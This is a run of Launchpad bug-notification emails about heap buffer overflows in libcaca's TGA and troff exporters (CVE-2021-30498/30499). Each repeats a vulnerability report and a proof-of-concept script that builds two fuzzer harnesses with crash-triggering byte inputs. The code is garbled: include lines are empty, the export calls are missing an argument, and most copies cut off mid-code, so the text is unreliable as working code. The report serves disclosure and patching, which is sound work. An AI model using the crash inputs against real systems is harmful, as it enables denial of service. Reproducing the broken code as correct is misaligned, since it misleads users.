[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu)
Status: Confirmed => Fix Released
--
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273
Title:
buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
export_troff
Status in libcaca package in Ubuntu:
Fix Released
Bug description:
Hello Ubuntu Security Team
I use libfuzzer to test libcaca api .I found two crash
- https://github.com/cacalabs/libcaca/issues/53
- https://github.com/cacalabs/libcaca/issues/54
## Vendor of Product
https://github.com/cacalabs/libcaca
## Affected Product Code Base
libcaca e4968ba
## Affected Component
affected component:libcaca.so
## Affected source code file
affected source code file(As call stack):
->caca_export_canvas_to_memory() in
libcaca/caca/codec/export.c
->caca_export_memory()in
libcaca/caca/codec/export.c
-> export_tga()in
libcaca/caca/codec/export.c
-> export_troff() in
libcaca/caca/codec/export.c
## Attack Type
Context-dependent
## Impact Denial of Service
true
## Reference
https://github.com/cacalabs/libcaca
## Discoverer
fdgnneig
## Verification process and POC
### Verification steps:
1.Get the source code of libcaca:
2.Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc
4.Run POC
POC.sh
```
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"troff",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o
poc_troff
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"tga",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu)
Status: New => Confirmed
--
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273
Title:
buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
export_troff
Status in libcaca package in Ubuntu:
Confirmed
Bug description:
Hello Ubuntu Security Team
I use libfuzzer to test libcaca api .I found two crash
- https://github.com/cacalabs/libcaca/issues/53
- https://github.com/cacalabs/libcaca/issues/54
## Vendor of Product
https://github.com/cacalabs/libcaca
## Affected Product Code Base
libcaca e4968ba
## Affected Component
affected component:libcaca.so
## Affected source code file
affected source code file(As call stack):
->caca_export_canvas_to_memory() in
libcaca/caca/codec/export.c
->caca_export_memory()in
libcaca/caca/codec/export.c
-> export_tga()in
libcaca/caca/codec/export.c
-> export_troff() in
libcaca/caca/codec/export.c
## Attack Type
Context-dependent
## Impact Denial of Service
true
## Reference
https://github.com/cacalabs/libcaca
## Discoverer
fdgnneig
## Verification process and POC
### Verification steps:
1.Get the source code of libcaca:
2.Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc
4.Run POC
POC.sh
```
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"troff",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o
poc_troff
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"tga",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++ -g poc_tga.cc
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Issues have been assigned numbers CVE-2021-30498、CVE-2021-30499
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499
--
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273
Title:
buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
export_troff
Status in libcaca package in Ubuntu:
New
Bug description:
Hello Ubuntu Security Team
I use libfuzzer to test libcaca api .I found two crash
- https://github.com/cacalabs/libcaca/issues/53
- https://github.com/cacalabs/libcaca/issues/54
## Vendor of Product
https://github.com/cacalabs/libcaca
## Affected Product Code Base
libcaca e4968ba
## Affected Component
affected component:libcaca.so
## Affected source code file
affected source code file(As call stack):
->caca_export_canvas_to_memory() in
libcaca/caca/codec/export.c
->caca_export_memory()in
libcaca/caca/codec/export.c
-> export_tga()in
libcaca/caca/codec/export.c
-> export_troff() in
libcaca/caca/codec/export.c
## Attack Type
Context-dependent
## Impact Denial of Service
true
## Reference
https://github.com/cacalabs/libcaca
## Discoverer
fdgnneig
## Verification process and POC
### Verification steps:
1.Get the source code of libcaca:
2.Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc
4.Run POC
POC.sh
```
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"troff",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o
poc_troff
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"tga",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Summary changed:
- libcaca buffer-overflow
+ buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
--
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273
Title:
buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
export_troff
Status in libcaca package in Ubuntu:
New
Bug description:
Hello Ubuntu Security Team
I use libfuzzer to test libcaca api .I found two crash
- https://github.com/cacalabs/libcaca/issues/53
- https://github.com/cacalabs/libcaca/issues/54
## Vendor of Product
https://github.com/cacalabs/libcaca
## Affected Product Code Base
libcaca e4968ba
## Affected Component
affected component:libcaca.so
## Affected source code file
affected source code file(As call stack):
->caca_export_canvas_to_memory() in
libcaca/caca/codec/export.c
->caca_export_memory()in
libcaca/caca/codec/export.c
-> export_tga()in
libcaca/caca/codec/export.c
-> export_troff() in
libcaca/caca/codec/export.c
## Attack Type
Context-dependent
## Impact Denial of Service
true
## Reference
https://github.com/cacalabs/libcaca
## Discoverer
fdgnneig
## Verification process and POC
### Verification steps:
1.Get the source code of libcaca:
2.Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc
4.Run POC
POC.sh
```
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"troff",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o
poc_troff
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"tga",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
